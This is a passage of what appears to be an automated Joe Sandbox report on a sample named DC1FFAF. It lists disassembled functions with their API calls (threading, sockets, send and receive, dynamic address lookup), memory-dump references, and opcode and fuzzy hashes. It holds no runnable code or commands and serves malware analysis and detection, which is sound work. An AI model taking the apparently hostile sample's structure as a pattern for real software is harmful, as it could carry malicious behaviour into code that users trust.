                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 0049C4E8
                                                                                                                                      • __getptd.LIBCMT ref: 0049C501
                                                                                                                                      • CreateThread.KERNEL32(?,?,?,0049C434,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0049C539
                                                                                                                                      • __dosmaperr.LIBCMT ref: 0049C55A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateThread___set_flsgetvalue__dosmaperr__getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1707747371-0
                                                                                                                                      • Opcode ID: 3279fff836aa5bbbe68b580e6cfa22b604f1cb30527b7c84fc12590e86e3c1a4
                                                                                                                                      • Instruction ID: 9808739b9ff93420b5ab490de9217359d76b053966f85b3a5eea94bb21b41e10
                                                                                                                                      • Opcode Fuzzy Hash: 3279fff836aa5bbbe68b580e6cfa22b604f1cb30527b7c84fc12590e86e3c1a4
                                                                                                                                      • Instruction Fuzzy Hash: 2611E272500218BFCF20BFA5DDC289F7FA8EF04728B11443FF50493142DB39AA4196A9
                                                                                                                                      Function 00466280 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset_strlen$__strlwr
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3936980223-0
                                                                                                                                      • Opcode ID: aaef4ae3fe62e7112f21e790cc88ba1e2601a583a7300b0743ddac56af09198e
                                                                                                                                      • Instruction ID: 6bc48b29f06b5604459946f1f42090026991eb3783dd0c415a1ec4a33f14a4b7
                                                                                                                                      • Opcode Fuzzy Hash: aaef4ae3fe62e7112f21e790cc88ba1e2601a583a7300b0743ddac56af09198e
                                                                                                                                      • Instruction Fuzzy Hash: 60110CB1D0020C56DF20D761FC47FDD777C5B64308F0005E9A90896282FAB8AB89CBD6
                                                                                                                                      Function 0049C3B6 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0049C3C9
                                                                                                                                        • Part of subcall function 004A2D70: __FindPESection.LIBCMT ref: 004A2DCB
                                                                                                                                      • __freeptd.LIBCMT ref: 0049C3E3
                                                                                                                                      • __getptd.LIBCMT ref: 0049C3FF
                                                                                                                                      • __XcptFilter.LIBCMT ref: 0049C420
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CurrentFilterFindImageNonwritableSectionXcpt__freeptd__getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3310430732-0
                                                                                                                                      • Opcode ID: 8f4ef2ec507697f95154c18ec5c8e6343c8a060314c2704b18cb7bd71f2937b4
                                                                                                                                      • Instruction ID: b40089b45c3be9c62dca97f810451aba3a0a6fef3ee72efbc57092bc372079be
                                                                                                                                      • Opcode Fuzzy Hash: 8f4ef2ec507697f95154c18ec5c8e6343c8a060314c2704b18cb7bd71f2937b4
                                                                                                                                      • Instruction Fuzzy Hash: 44F0A474100200AFDF18B7A5D94AE6E3F69AF04315F10442EF501DB6A2CEB8D9449658
                                                                                                                                      Function 0042DAC0 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 655COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset
                                                                                                                                      • String ID: F
                                                                                                                                      • API String ID: 2102423945-1304234792
                                                                                                                                      • Opcode ID: d39a987e18a40a9fd3865d7d6f7d8005386174c7c90697f2872b7505502c928f
                                                                                                                                      • Instruction ID: 58cb4b9a7bfaaaeaae9c4f1f8ff8b70a1f50d6989cccf670be0b491f8a800fe4
                                                                                                                                      • Opcode Fuzzy Hash: d39a987e18a40a9fd3865d7d6f7d8005386174c7c90697f2872b7505502c928f
                                                                                                                                      • Instruction Fuzzy Hash: AC62D478E00219CFDB18CF58D591BADFBB2BF88308F5481AAD409AB356C771A942CF55
                                                                                                                                      Function 0044DC00 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 348COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset
                                                                                                                                      • String ID: P
                                                                                                                                      • API String ID: 2102423945-3110715001
                                                                                                                                      • Opcode ID: 7db4b8705884d39606c5365df0c2116599aabbfd447b791233be15b84b2059f7
                                                                                                                                      • Instruction ID: 4ccbaa116d509acd672fb670bc6cab217618a11734028653ee04e55adcc5756a
                                                                                                                                      • Opcode Fuzzy Hash: 7db4b8705884d39606c5365df0c2116599aabbfd447b791233be15b84b2059f7
                                                                                                                                      • Instruction Fuzzy Hash: 41F1E2B4A016289FDB24DF15CC90BEEB7B5BF88304F1081DAE509A7291DB35AE85CF54
                                                                                                                                      Function 69E9A7F0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 215COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 69E9A848
                                                                                                                                        • Part of subcall function 69EBED6C: __FF_MSGBANNER.LIBCMT ref: 69EBED8F
                                                                                                                                        • Part of subcall function 69EBED6C: __NMSG_WRITE.LIBCMT ref: 69EBED96
                                                                                                                                        • Part of subcall function 69EBED6C: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,69EC8DFF,?,00000001,?,?,69EC7CE7,00000018,69EE8F08,0000000C,69EC7D78), ref: 69EBEDE3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                                      • String ID: %1s
                                                                                                                                      • API String ID: 501242067-3465968173
                                                                                                                                      • Opcode ID: 054dc2d6698fc30be28a96edbc3c0c60974a83157899bdab9549b4588c5f735c
                                                                                                                                      • Instruction ID: 5982a5b16288faa83a58e04fa4c30fa566582571f7430f3fc9a64ea966bc051b
                                                                                                                                      • Opcode Fuzzy Hash: 054dc2d6698fc30be28a96edbc3c0c60974a83157899bdab9549b4588c5f735c
                                                                                                                                      • Instruction Fuzzy Hash: 11712575D983408BCB10DF28998169FB3E5BFC9338F61882DE8A94B300E771D906C792
                                                                                                                                      Function 00448B50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169networkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • socket.WS2_32(?,00000002,00000001,00000000), ref: 00448B72
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: socket
                                                                                                                                      • String ID: 2$@
                                                                                                                                      • API String ID: 98920635-1603946714
                                                                                                                                      • Opcode ID: b4fc2bdc63ac2d1fa491ec7dd01e2ebefe7dc4177f68fa0917137397a8f053ec
                                                                                                                                      • Instruction ID: 3b1506bc9f13223de8ff2e4c5e6eb1d9f39eb086ef8fe796b86951164dbf03a1
                                                                                                                                      • Opcode Fuzzy Hash: b4fc2bdc63ac2d1fa491ec7dd01e2ebefe7dc4177f68fa0917137397a8f053ec
                                                                                                                                      • Instruction Fuzzy Hash: 3A716970A052198FEF64DF14C989BAEB7B1FF85304F1041DAE509AB291CB79AE81CF54
                                                                                                                                      Function 0046C7B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 004988A0: __fsopen.LIBCMT ref: 004988AD
                                                                                                                                      • _feof.LIBCMT ref: 0046C7FF
                                                                                                                                      • __fread_nolock.LIBCMT ref: 0046C82E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __fread_nolock__fsopen_feof
                                                                                                                                      • String ID: @
                                                                                                                                      • API String ID: 2557561242-2766056989
                                                                                                                                      • Opcode ID: 4b4b72325df17cd77c8d5ae3532e67a7cbff055037b7de83b0b4a0e09976cd18
                                                                                                                                      • Instruction ID: ce57d70953daff15d45475fcc1f51f857d9f1a285590abd0a778664c090dc678
                                                                                                                                      • Opcode Fuzzy Hash: 4b4b72325df17cd77c8d5ae3532e67a7cbff055037b7de83b0b4a0e09976cd18
                                                                                                                                      • Instruction Fuzzy Hash: 692123F5D00208ABDF14EBE5DC81A9EB778AF58308F10452EE519AB241F739AA44CF56
                                                                                                                                      Function 69EB42C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69EB41C4: GetModuleHandleA.KERNEL32(KERNEL32,69EB42DE,?,?), ref: 69EB41D2
                                                                                                                                        • Part of subcall function 69EB41C4: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 69EB41F3
                                                                                                                                        • Part of subcall function 69EB41C4: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 69EB4205
                                                                                                                                        • Part of subcall function 69EB41C4: GetProcAddress.KERNEL32(ActivateActCtx), ref: 69EB4217
                                                                                                                                        • Part of subcall function 69EB41C4: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 69EB4229
                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?), ref: 69EB42F8
                                                                                                                                      • SetLastError.KERNEL32(0000006F), ref: 69EB430F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$Module$ErrorFileHandleLastName
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2524245154-3916222277
                                                                                                                                      • Opcode ID: 4f40112e28cbcf9972f454a8ff7f4059f0a5e67369c41941022118f8d880e60d
                                                                                                                                      • Instruction ID: bd201c6d020f12a29652b6812e009a49c031d568b5a6c2bd55ccc9d59d252372
                                                                                                                                      • Opcode Fuzzy Hash: 4f40112e28cbcf9972f454a8ff7f4059f0a5e67369c41941022118f8d880e60d
                                                                                                                                      • Instruction Fuzzy Hash: FB2171708406289EDB20DF70CA487DDB7F8BF04328F60469ED069DB184EB745A85DF90
                                                                                                                                      Function 69EB0A98 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 69EB0AC0
                                                                                                                                      • PathFindExtensionA.SHLWAPI(?), ref: 69EB0AD6
                                                                                                                                        • Part of subcall function 69EB0829: __EH_prolog3_GS.LIBCMT ref: 69EB0833
                                                                                                                                        • Part of subcall function 69EB0829: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,69EB0AFA,?,?), ref: 69EB0863
                                                                                                                                        • Part of subcall function 69EB0829: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 69EB0877
                                                                                                                                        • Part of subcall function 69EB0829: ConvertDefaultLocale.KERNEL32(?), ref: 69EB08B3
                                                                                                                                        • Part of subcall function 69EB0829: ConvertDefaultLocale.KERNEL32(?), ref: 69EB08C1
                                                                                                                                        • Part of subcall function 69EB0829: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 69EB08DE
                                                                                                                                        • Part of subcall function 69EB0829: ConvertDefaultLocale.KERNEL32(?), ref: 69EB0909
                                                                                                                                        • Part of subcall function 69EB0829: ConvertDefaultLocale.KERNEL32(000003FF), ref: 69EB0912
                                                                                                                                        • Part of subcall function 69EB0829: GetModuleFileNameA.KERNEL32(69E80000,?,00000105), ref: 69EB09C7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                                                                                                                                      • String ID: %s%s.dll
                                                                                                                                      • API String ID: 1311856149-1649984862
                                                                                                                                      • Opcode ID: b8c7d12c4719bd7426fed93c625d2792b9dc1c2dd1de1a2e8e17d0c27abf09cb
                                                                                                                                      • Instruction ID: 62fc935350b225ced5c4d1052951622308a042088d15457925ac4fa00009eb5b
                                                                                                                                      • Opcode Fuzzy Hash: b8c7d12c4719bd7426fed93c625d2792b9dc1c2dd1de1a2e8e17d0c27abf09cb
                                                                                                                                      • Instruction Fuzzy Hash: 9501D171A0012C9FCB02CB68DE41AEF77E9AF49711F1004A9A501EB108DA70AF088BA0
                                                                                                                                      Function 004287E0 Relevance: 4.7, APIs: 3, Instructions: 203COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strlen$_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1297213449-0
                                                                                                                                      • Opcode ID: 5dc8e0400945efca44925cc953e9acc5bf054c34aae036b4fd9fb14eee393b9b
                                                                                                                                      • Instruction ID: 6385d719b6797728ea55fdb47bdf526b492b3281b602fd45a14bd0f3b6576436
                                                                                                                                      • Opcode Fuzzy Hash: 5dc8e0400945efca44925cc953e9acc5bf054c34aae036b4fd9fb14eee393b9b
                                                                                                                                      • Instruction Fuzzy Hash: 05816B70E01228DFDB14EFA1D951BEEB7B0BF44304F50815EE50AAB285DB786A49CF49
                                                                                                                                      Function 69E8DC90 Relevance: 4.6, APIs: 3, Instructions: 87networkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memsetrecvselect
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 159336290-0
                                                                                                                                      • Opcode ID: c2727b352ae55bede341bd899f4fd870ed454aa4d493aef55b2168564857ebda
                                                                                                                                      • Instruction ID: 37b68c79b352e3ece3ee871e6fca90bae2958958e4805b2ff85ac71deadfdcc2
                                                                                                                                      • Opcode Fuzzy Hash: c2727b352ae55bede341bd899f4fd870ed454aa4d493aef55b2168564857ebda
                                                                                                                                      • Instruction Fuzzy Hash: BD31E47564C784AFE324CB64D985BEBB7E8EBC6318F100E2FE09D82280D7359485CB52
                                                                                                                                      Function 00498B5B Relevance: 4.6, APIs: 3, Instructions: 82COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___set_flsgetvalue__dosmaperr__getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2338133679-0
                                                                                                                                      • Opcode ID: 8b24f8f7900e54c23254c35d2145ac40a688184db2c5c58256511c027655f903
                                                                                                                                      • Instruction ID: 4a3e59624dd69c828160645b6e43b66ed252965f5b28b38afd1b774967e3f942
                                                                                                                                      • Opcode Fuzzy Hash: 8b24f8f7900e54c23254c35d2145ac40a688184db2c5c58256511c027655f903
                                                                                                                                      • Instruction Fuzzy Hash: 12110572405340AFCF116FAA9882D4F7FA4EF52734B25457FF015961C2CE78A941866A
                                                                                                                                      Function 69E826F0 Relevance: 4.6, APIs: 3, Instructions: 70COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _malloc_memset_sprintf_strncpy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3423381085-0
                                                                                                                                      • Opcode ID: d07c12b220ba06b1f10ac7f34a17d0cf3954ad089b9026dc5b2e5fc96a6f784f
                                                                                                                                      • Instruction ID: 44e74737d16d306b2063184dec94e215d177db093874273d8caa7100ec1e4dd3
                                                                                                                                      • Opcode Fuzzy Hash: d07c12b220ba06b1f10ac7f34a17d0cf3954ad089b9026dc5b2e5fc96a6f784f
                                                                                                                                      • Instruction Fuzzy Hash: 1721CFB9904341AFD325CF69C951BABBBE4BF89344F20892DE549CB250EB35A404CBD2
                                                                                                                                      Function 69E8DBF0 Relevance: 4.6, APIs: 3, Instructions: 54networkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • select.WS2_32 ref: 69E8DC37
                                                                                                                                      • send.WS2_32(?,?,?,00000000), ref: 69E8DC52
                                                                                                                                      • WSAGetLastError.WS2_32(?,00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 69E8DC5C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
